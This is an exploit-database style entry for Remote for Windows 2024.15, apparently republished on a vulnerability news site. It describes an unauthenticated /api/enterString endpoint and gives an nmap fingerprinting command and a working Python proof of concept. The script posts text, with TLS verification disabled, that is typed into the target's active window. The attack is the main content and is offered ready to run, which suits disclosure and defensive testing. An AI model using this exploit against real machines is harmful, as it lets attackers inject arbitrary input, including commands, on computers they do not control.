# Exploit Title: Remote for Windows 2024.15 - Unauthenticated Arbitrary
Input # Exploit Title: Remote for Windows 2024.15 - Unauthenticated Arbitrary
Input into Active Window
# Date: 2025-05-23
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://rs.ltd
# Software Link: https://rs.ltd/latest.php?os=win
# Version: 2024.15
# Tested on: Windows 10/11 with Remote for Windows (helper)
'''
Description:
- The enterString API endpoint allows unauthenticated attackers to inject
raw text into the target's active window without requiring keystroke
simulation or special keycodes.
- Works when "Allow unknown devices" setting is enabled (default: disabled)
Vulnerable Component:
- The /api/enterString endpoint with missing authentication checks
# Identification:
nmap -p- -T4 <TARGET_IP> --script ssl-cert
Look for SSL cert with subject: CN=SecureHTTPServer/O=Evgeny Cherpak/C=US
'''
import requests
import urllib3
urllib3.disable_warnings()
TARGET_IP = "192.168.8.105"
TEXT_TO_INJECT = "This text appears verbatim on the target"
response = requests.post(
f"https://
{TARGET_IP}:49762/api/enterString={requests.utils.quote(TEXT_TO_INJECT)}",
headers={
"X-ClientToken": "unchecked",
"X-HostName": "any",
"X-HostFullModel": "any"
},
verify=False
)
print(f"Status: {response.status_code}")
Remote for Windows 2024.15 Unauthenticated Arbitrary Input
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 635
